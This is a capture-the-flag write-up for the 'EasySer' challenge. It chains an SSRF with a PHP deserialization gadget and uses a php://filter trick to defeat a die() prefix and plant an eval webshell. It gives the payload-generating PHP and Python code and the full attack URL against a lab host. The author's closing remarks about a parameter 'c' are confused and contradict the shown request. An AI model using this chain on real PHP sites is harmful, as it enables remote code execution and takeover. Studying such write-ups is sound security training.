# 羊城杯 2020-EasySer
There is nothing obvious on the landing page, so start with routine information gathering: robots.txt, www.zip, www.zip.gz.
robots.txt reveals:
star1.php
Opening star1.php and viewing its source (Ctrl+U) shows a hint to the effect of "you can only get into ser.php with an insecure protocol from my home", i.e. a plain http:// request that originates from 127.0.0.1. star1.php takes a `path` parameter (see the final request below) and fetches it server-side, which is the SSRF we need.
Requesting http://127.0.0.1/ser.php through that parameter returns the source of ser.php (you can fetch star1.php the same way first), because the request now arrives from the loopback address and passes the REMOTE_ADDR check:
ser.php:
```php
<?php
error_reporting(0);
// The source is only shown to requests arriving from the loopback address,
// hence the SSRF through star1.php.
if ( $_SERVER['REMOTE_ADDR'] == "127.0.0.1" ) {
    highlight_file(__FILE__);
}
$flag='{Trump_:"fake_news!"}';
class GWHT{
    public $hero;
    public function __construct(){
        $this->hero = new Yasuo;
    }
    // String conversion of a GWHT object calls hasaki() on whatever $hero holds.
    public function __toString(){
        if (isset($this->hero)){
            return $this->hero->hasaki();
        }else{
            return "You don't look very happy";
        }
    }
}
class Yongen{ //flag.php
    public $file;
    public $text;
    public function __construct($file='',$text='') {
        $this->file = $file;
        $this->text = $text;
    }
    // Arbitrary file write, but every write is prefixed with a die() stub.
    public function hasaki(){
        $d = '<?php die("nononon");?>';
        $a= $d. $this->text;
        @file_put_contents($this->file,$a);
    }
}
class Yasuo{
    public function hasaki(){
        return "I'm the best happy windy man";
    }
}
?>
```
The write in Yongen::hasaki() prepends `<?php die("nononon");?>` to our text, so whatever we write ends up after a `die()` and never executes.
The way around it is to make `$file` a php://filter write stream, `php://filter/write=string.strip_tags|convert.base64-decode/resource=shell.php`. The filters run over the whole buffer before it reaches disk: `string.strip_tags` removes the `<?php die("nononon");?>` tag (our base64 text contains no tags and survives), then `convert.base64-decode` turns what is left into our webshell. The die() stub is gone and only our code lands in shell.php. The chain is triggered when the unserialized GWHT object is used as a string: GWHT::__toString() calls $this->hero->hasaki(), and we have swapped $hero from a Yasuo to a Yongen, so that call is the file write.
One caveat: string.strip_tags was deprecated in PHP 7.3 and removed in PHP 8.0. Against such a target the usual fallback is `write=convert.base64-decode` on its own: the decoder drops every character outside the base64 alphabet, so only `phpdienononon` (13 characters) survives from the prefix; pad the text with three extra characters so those 16 form whole 4-character groups, and the payload that follows decodes intact after 12 bytes of junk.
Script:
```php
<?php
// Same class names and property order as ser.php; no methods are needed,
// serialize() only records the public properties.
class GWHT{
    public $hero;
}
class Yongen{
    public $file="php://filter/write=string.strip_tags|convert.base64-decode/resource=shell.php";
    public $text="PD9waHAgQGV2YWwoJF9QT1NUWzFdKTs/Pg==";
    //<?php @eval($_POST[1]);?>
}
$a = new GWHT();
$a->hero = new Yongen();
echo urlencode(serialize($a));
```
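The following is an added example, not part of the original writeup or the challenge. It rebuilds the same serialized payload without a PHP interpreter (a minimal PHP `serialize()` for strings and objects, plus PHP-style `urlencode()`), and then models what actually reaches shell.php under the two filter chains discussed above: the `string.strip_tags|convert.base64-decode` chain used here, and the `convert.base64-decode`-only fallback for PHP 8 with its padding requirement. Assumptions not taken from the page: `strip_tags_model()` is a simplified stand-in for PHP's `string.strip_tags` that is only adequate for the `<?php die("nononon");?>` prefix, and the padding variant relies on PHP's base64 filter dropping characters outside the base64 alphabet (Python's `validate=False` is used to mirror that).

```python
# Added example (not from the original writeup): rebuilds the EasySer payload
# and models why the php://filter write chain defeats the die() prefix.
# Assumptions not in the page: strip_tags_model() is a simplified stand-in for
# PHP's string.strip_tags, adequate only for the '<?php die("nononon");?>'
# prefix; the padding variant relies on PHP's convert.base64-decode filter
# dropping characters outside the base64 alphabet.
import base64
import re
from urllib.parse import quote_plus

WEBSHELL = b'<?php @eval($_POST[1]);?>'       # what we want on disk
DIE_PREFIX = b'<?php die("nononon");?>'        # what Yongen::hasaki() prepends
B64_ALPHABET = set(b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/")


class PhpObject:
    """A PHP object to serialize: class name plus public properties in declaration order."""
    def __init__(self, cls, **props):
        self.cls = cls
        self.props = props


def php_serialize(value):
    """Minimal PHP serialize() for strings and objects (the only types this chain needs)."""
    if isinstance(value, str):
        return f's:{len(value.encode())}:"{value}";'
    if isinstance(value, PhpObject):
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in value.props.items())
        return f'O:{len(value.cls)}:"{value.cls}":{len(value.props)}:{{{body}}}'
    raise TypeError(f"unsupported type {type(value).__name__}")


def build_payload(filter_chain="string.strip_tags|convert.base64-decode",
                  target="shell.php", text=None):
    """GWHT->hero = Yongen(file=php://filter write stream, text=base64 webshell)."""
    if text is None:
        text = base64.b64encode(WEBSHELL).decode()
    yongen = PhpObject("Yongen",
                       file=f"php://filter/write={filter_chain}/resource={target}",
                       text=text)
    return php_serialize(PhpObject("GWHT", hero=yongen))


def url_encode(s):
    """PHP urlencode(): everything but [A-Za-z0-9_.-] becomes %XX, space becomes '+'."""
    return quote_plus(s, safe="")


def strip_tags_model(data):
    """Approximation of string.strip_tags: '<?php ... ?>' is treated as one tag and removed."""
    return re.sub(rb"<[^>]*>", b"", data)


def written_via_strip_tags_chain(text):
    """Bytes that reach shell.php with write=string.strip_tags|convert.base64-decode."""
    buffer = DIE_PREFIX + text.encode()
    return base64.b64decode(strip_tags_model(buffer))


def written_via_base64_only(text):
    """Bytes that reach shell.php with write=convert.base64-decode alone (PHP 8 fallback).
    validate=False mirrors the filter discarding non-alphabet characters."""
    return base64.b64decode(DIE_PREFIX + text.encode(), validate=False)


def payload_survives_base64_only(text, payload=WEBSHELL):
    """True when the decoded buffer still ends with the intact payload."""
    try:
        return written_via_base64_only(text).endswith(payload)
    except ValueError:   # binascii.Error (a ValueError): misaligned 4-char groups
        return False


def padded_text_for_base64_only(payload=WEBSHELL):
    """Pad so the prefix's surviving alphabet chars ('phpdienononon', 13) plus padding
    fill whole 4-char groups; the payload then decodes intact after 12 junk bytes."""
    survivors = sum(1 for c in DIE_PREFIX if c in B64_ALPHABET)
    return "a" * ((-survivors) % 4) + base64.b64encode(payload).decode()


if __name__ == "__main__":
    payload = build_payload()
    print(payload)
    print(url_encode(payload))
    print(written_via_strip_tags_chain(base64.b64encode(WEBSHELL).decode()))
    print(written_via_base64_only(padded_text_for_base64_only()))
```

Running it prints the same serialized string and URL-encoded form as the PHP script above, then the two on-disk results: the strip_tags chain yields exactly the webshell, while the base64-only fallback yields 12 junk bytes followed by the webshell, which PHP happily emits as plain output before the `<?php` tag.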
Modifying the values directly failed, and I don't know why; perhaps that was the cause.
I didn't know where the injection point was, so I used arjun to scan for parameters, but it found nothing, not sure why; the parameter that came out was c.
http://4f22b021-d9bb-4797-8bf1-60de688b4cd7.node5.buuoj.cn:81/star1.php?path=O%3A4%3A%22GWHT%22%3A1%3A%7Bs%3A4%3A%22hero%22%3BO%3A6%3A%22Yongen%22%3A2%3A%7Bs%3A4%3A%22file%22%3Bs%3A77%3A%22php%3A%2F%2Ffilter%2Fwrite%3Dstring.strip_tags%7Cconvert.base64-decode%2Fresource%3Dshell.php%22%3Bs%3A4%3A%22text%22%3Bs%3A36%3A%22PD9waHAgQGV2YWwoJF9QT1NUWzFdKTs%2FPg%3D%3D%22%3B%7D%7D
Then just connect to shell.php with AntSword (蚁剑); the password is 1. The relative resource path puts shell.php in the working directory of the PHP process, which here is the web root next to star1.php.
Reference: https://www.cnblogs.com/magic123/articles/17511984.html